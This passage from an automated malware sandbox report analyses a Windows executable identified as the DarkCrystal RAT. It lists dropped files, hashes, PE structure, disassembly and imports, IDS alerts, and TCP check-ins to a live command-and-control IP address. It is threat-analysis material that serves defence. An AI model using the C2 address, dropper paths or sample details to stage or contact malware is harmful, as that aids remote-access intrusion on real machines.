                                      Entropy (8bit):5.004878388983618
                                      Encrypted:false
                                      SSDEEP:3:NPIylf1hgueY/nHYypLsfXesHXqXL40xGA:NPdrReY/n7s3qbDl
                                      MD5:D589F058493EC831D1BF8557D8BF5BCE
                                      SHA1:23F75C8FA6F4BB7F193A19671F61B4F90BE6F3E7
                                      SHA-256:403A9ABF284F8E4A80522EA6D08ED5954D6AC7A9E791270BFFF73D491B207D63
                                      SHA-512:3271A5AF46C78FC10791DC0C28341AAFA92B39A56537B6C93C6C77CD4062A1B2C25C780306D3154A69BAB69C301C1FDEA81283DE1251397DBF4C999B8697017B
                                      Malicious:false
                                      Preview:%Qcm%%hcNfPXIJctz%..%taizPDEqRyxZ%"%AppData%\msProviderbrowserrefdll/winIntorefruntimebroker.exe"%itXasTc%

                                      C:\Windows\INF\e226a7d7102d53

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):207
                                      Entropy (8bit):5.773584941669277
                                      Encrypted:false
                                      SSDEEP:6:3kh6aeXWjTEayH4uU6gohZRy/g6glxeC/p:UQXWjTd6bRy/2f9h
                                      MD5:C1AD9BA17CA7FAF3DB2818F906759E8E
                                      SHA1:1739BAE78F0D232DCA7E3C0006665373D9D3D437
                                      SHA-256:B971AF0D735103FFFBA9D75D400BE1BC7DB01F7BF395669A8E509769989BD3EA
                                      SHA-512:FA5457814DEF6BF12123908FFE6204DE2B5B5695EA192BBD83395C7BABC82534230EFCC490E80ABB187C3BFE3FC05307DD54A8876EECECD7D6F9F557908B5802
                                      Malicious:false
                                      Preview:Yud36a0Q7JukxUcNygIMi89QJ47hAjI650TZYhJrspVTBQeYXA1c3JoZvNuBdSQYAxp6BCyRXbe2nqO2aiK9rqDvM3oLwHNZZ7SOkhWULkFbowwF82l4IQrUt4uHXnePOFcqX9S2LzxGllGaHjM4fTRIQ8eqwO7iGzNjTFr9ktsScksIxUAybju4yUaZelF62P9vXhGB1MUwk8p

                                      C:\Windows\INF\fXvSafnhbinoSxnWSYFNsCJETLnb.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*

                                      C:\Windows\en-GB\e226a7d7102d53

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):190
                                      Entropy (8bit):5.669308538034561
                                      Encrypted:false
                                      SSDEEP:3:JQLMtEIWHRSXBgwqNwTe3mcTADNPTyiBgTc6jS2ofKiTRZEDVcZynUkj7hwGsXn:JrtE3Hgmw2wTe39ARPxBC2fhTRZEpOyw
                                      MD5:F34814448AFDCD674A08B5069A84F8C1
                                      SHA1:C1A40E6D28A1C4DAD78773BAC84FD29746569E85
                                      SHA-256:61B9307F1A5836FBA488C5B706244AB58BA53A47C7F07032C0DFB7D29A845A64
                                      SHA-512:A375AA45C7020A49FFE21CC7352F68788746613C944F6E80066F21253EAD4A18BFE6BEEEF7BD580140095334C97093E06383F9DCDBD211BA7F721F1A864A8403
                                      Malicious:false
                                      Preview:oS6z5nfAdWH7oz1486UKsyAr3SKy3p9hdfXYIEEUOhU6xyVWMCAp4bc0SP5ncqGxXkeIbdv41A6LdE3E6yl0oUmBChF3Ib1hbgjNUM4sRGy4fRWOW1qoFPIC7cG4X2vaIYt6fpuu42iigsgvK1gRuNcLXgQ1G9UZUXvGhZtqG6tMrkgO6UugVeq56ij8Z2

                                      C:\Windows\en-GB\fXvSafnhbinoSxnWSYFNsCJETLnb.exe

                                      Download File
                                      Process:C:\Users\user\AppData\Roaming\msProviderbrowserrefdll\winIntorefruntimebroker.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):1656320
                                      Entropy (8bit):7.420770523484582
                                      Encrypted:false
                                      SSDEEP:24576:7nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQoYyx8MU:7TAjRK61bGW2djTuBkLIX8
                                      MD5:07A0FB75F52C87371C88F48AE80AFA1B
                                      SHA1:A2184C8F4C5A1B81A1E8BF426DB05EAC504A66A0
                                      SHA-256:51DF5CF4F67D6148C92D2BDAA10596F2952371B8C3EC85D21CDF74AF6274AF34
                                      SHA-512:0322117985791E69BA8E985659B7F91FCCA76809C998C9AE4AF5FCD98B2D757E8E18960FBE3C6D9C9AC306E5F01A78D7E70E950D3B77A80ABA1698C5B69C75CB
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 78%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................>..........^\... ...`....@.. ....................................@..................................\..K....`..p............................................................................ ............... ..H............text...d<... ...>.................. ..`.rsrc...p....`.......@..............@....reloc...............D..............@..B................@\......H...........t.......g...h....z...[.......................................0..........(.... ........8........E....)...9.......8...8$...(.... ....~....{....9....& ....8....(.... ....8....*(.... ....~....{l...9....& ....8........0.......... ........8........E....P.......|...........8K...~....(A... .... .... ....s....~....(E....... ....~....{....9....& ....8........~....(I...~....(M... ....?:... ....8k......... ....~....{....:Q...& ....8F...r...ps....z*~....:.... ....8&.....(....*

                                      \Device\Null

                                      Download File
                                      Process:C:\Windows\System32\w32tm.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):151
                                      Entropy (8bit):4.757812247066604
                                      Encrypted:false
                                      SSDEEP:3:VLV993J+miJWEoJ8FXrX9QuL1XVWVVfXV0X6vo5V1XQNvj:Vx993DEUQtBJs1uXFL1Ax
                                      MD5:45D0BEB9E43D5C6134AF4AFEE9240B5C
                                      SHA1:F0BAE8D5E9AD333B413A26E6AC36FA893B3CA8EA
                                      SHA-256:51F1925534FF477FC3F09AD8A483121638354DB2261979C9FC726E8BECDBB560
                                      SHA-512:0B0C1698DE8A666FFBB6AA877D1065D322C6E7553E44827EF549C562DC6C0513B4AEE660C30B72E5FDCA982F65E7B2959BB84529661499A53684497364714EE7
                                      Malicious:false
                                      Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 03/01/2025 14:00:20..14:00:20, error: 0x80072746.14:00:25, error: 0x80072746.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.3662428781202385
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:7vP2IvNXqx.exe
                                      File size:1'978'248 bytes
                                      MD5:1a3a764c4b4974435dba8926e7137766
                                      SHA1:7cf7f1525fc7deb3d8523ac550a3787765ce6742
                                      SHA256:2028b4c9f540e5d74ce2ad0f9a443badc827f1f70af23dfd01455747e564b1a2
                                      SHA512:4923168584d0a34151fbbee0c07e6700ec6de424af708f52ff4aaf329b6186e304e3a0aa18b5c1c01e1e83f75f18a41ac4319ddbaf7df19c03472962e3b03b63
                                      SSDEEP:24576:2TbBv5rUyXV/nCWlkJXwz6a/Ji9v8yK6V3RO2GGqF252dfr3MuURBkIELgTZRZQ+:IBJ/TAjRK61bGW2djTuBkLIX8M
                                      TLSH:7C959E0AA6965E32D2653F3285FB041D83B0D6637653DF4B3A5F65E3A8153708B232F2
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                      File Icon

                                      Icon Hash:1515d4d4442f2d2d

                                      Static PE Info

                                      General

                                      Entrypoint:0x41f530
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:1
                                      File Version Major:5
                                      File Version Minor:1
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:1
                                      Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                      Entrypoint Preview

                                      Instruction
                                      call 00007F0A14D0EB7Bh
                                      jmp 00007F0A14D0E48Dh
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      push dword ptr [ebp+08h]
                                      mov esi, ecx
                                      call 00007F0A14D012D7h
                                      mov dword ptr [esi], 004356D0h
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      and dword ptr [ecx+04h], 00000000h
                                      mov eax, ecx
                                      and dword ptr [ecx+08h], 00000000h
                                      mov dword ptr [ecx+04h], 004356D8h
                                      mov dword ptr [ecx], 004356D0h
                                      ret
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      push esi
                                      mov esi, ecx
                                      lea eax, dword ptr [esi+04h]
                                      mov dword ptr [esi], 004356B8h
                                      push eax
                                      call 00007F0A14D1191Fh
                                      test byte ptr [ebp+08h], 00000001h
                                      pop ecx
                                      je 00007F0A14D0E61Ch
                                      push 0000000Ch
                                      push esi
                                      call 00007F0A14D0DBD9h
                                      pop ecx
                                      pop ecx
                                      mov eax, esi
                                      pop esi
                                      pop ebp
                                      retn 0004h
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F0A14D01252h
                                      push 0043BEF0h
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F0A14D113D9h
                                      int3
                                      push ebp
                                      mov ebp, esp
                                      sub esp, 0Ch
                                      lea ecx, dword ptr [ebp-0Ch]
                                      call 00007F0A14D0E598h
                                      push 0043C0F4h
                                      lea eax, dword ptr [ebp-0Ch]
                                      push eax
                                      call 00007F0A14D113BCh
                                      int3
                                      jmp 00007F0A14D12E57h
                                      int3
                                      int3
                                      int3
                                      int3
                                      push 00422900h
                                      push dword ptr fs:[00000000h]

                                      Rich Headers

                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                      PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                      RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                      RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                      RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                      RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                      RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                      RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                      RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                      RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                      RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                      RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                      RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                      RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                      RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                      RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                      RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                      RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                      RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                      RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                      RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                      RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                      RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                      RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                      RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                      RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                      RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                      Imports

                                      DLLImport
                                      KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                      gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Suricata IDS Alerts

                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2025-01-03T18:32:05.218406+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449730206.188.197.2480TCP
                                      2025-01-03T18:32:16.780963+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449737206.188.197.2480TCP
                                      2025-01-03T18:32:23.515197+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449738206.188.197.2480TCP
                                      2025-01-03T18:32:30.124537+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449739206.188.197.2480TCP
                                      2025-01-03T18:32:36.765117+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449740206.188.197.2480TCP
                                      2025-01-03T18:32:47.468862+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449741206.188.197.2480TCP
                                      2025-01-03T18:32:54.686916+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449743206.188.197.2480TCP
                                      2025-01-03T18:33:01.280651+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449780206.188.197.2480TCP
                                      2025-01-03T18:33:08.764962+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449827206.188.197.2480TCP
                                      2025-01-03T18:33:15.561834+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449868206.188.197.2480TCP
                                      2025-01-03T18:33:22.155558+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449907206.188.197.2480TCP
                                      2025-01-03T18:33:28.718020+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449945206.188.197.2480TCP
                                      2025-01-03T18:33:39.030477+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450010206.188.197.2480TCP
                                      2025-01-03T18:33:45.218167+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450015206.188.197.2480TCP
                                      2025-01-03T18:33:55.796071+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450016206.188.197.2480TCP

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 3, 2025 18:32:04.536381960 CET4973080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:04.541340113 CET8049730206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:04.541522980 CET4973080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:04.541862011 CET4973080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:04.546617031 CET8049730206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:04.891035080 CET4973080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:04.895926952 CET8049730206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:05.165966988 CET8049730206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:05.218405962 CET4973080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:05.458966017 CET4973080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:16.123888016 CET4973780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:16.129609108 CET8049737206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:16.129693031 CET4973780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:16.130064964 CET4973780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:16.135636091 CET8049737206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:16.484189034 CET4973780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:16.489680052 CET8049737206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:16.733911991 CET8049737206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:16.780962944 CET4973780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:17.032861948 CET4973780192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:22.841193914 CET4973880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:22.846167088 CET8049738206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:22.846242905 CET4973880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:22.846575022 CET4973880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:22.852165937 CET8049738206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:23.203473091 CET4973880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:23.208328962 CET8049738206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:23.469327927 CET8049738206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:23.515197039 CET4973880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:23.798952103 CET4973880192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:29.443932056 CET4973980192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:29.448725939 CET8049739206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:29.448803902 CET4973980192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:29.449120998 CET4973980192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:29.453823090 CET8049739206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:29.796830893 CET4973980192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:29.801681042 CET8049739206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:30.071332932 CET8049739206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:30.124536991 CET4973980192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:30.332206011 CET4973980192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:36.098517895 CET4974080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:36.103419065 CET8049740206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:36.103549004 CET4974080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:36.103775024 CET4974080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:36.108509064 CET8049740206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:36.452882051 CET4974080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:36.457748890 CET8049740206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:36.712089062 CET8049740206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:36.765116930 CET4974080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:36.937591076 CET4974080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:46.812135935 CET4974180192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:46.817115068 CET8049741206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:46.817199945 CET4974180192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:46.817472935 CET4974180192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:46.822261095 CET8049741206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:47.171789885 CET4974180192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:47.176687956 CET8049741206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:47.421807051 CET8049741206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:47.468862057 CET4974180192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:48.170681000 CET4974180192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:53.997658968 CET4974380192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:54.002878904 CET8049743206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:54.002989054 CET4974380192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:54.003305912 CET4974380192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:54.008061886 CET8049743206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:54.359172106 CET4974380192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:54.363955021 CET8049743206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:54.635205984 CET8049743206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:32:54.686916113 CET4974380192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:32:54.907603025 CET4974380192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:00.598774910 CET4978080192.168.2.4206.188.197.24
                                      Jan 3, 2025 18:33:00.603629112 CET8049780206.188.197.24192.168.2.4
                                      Jan 3, 2025 18:33:00.603746891 CET4978080192.168.2.4206.188.197.24
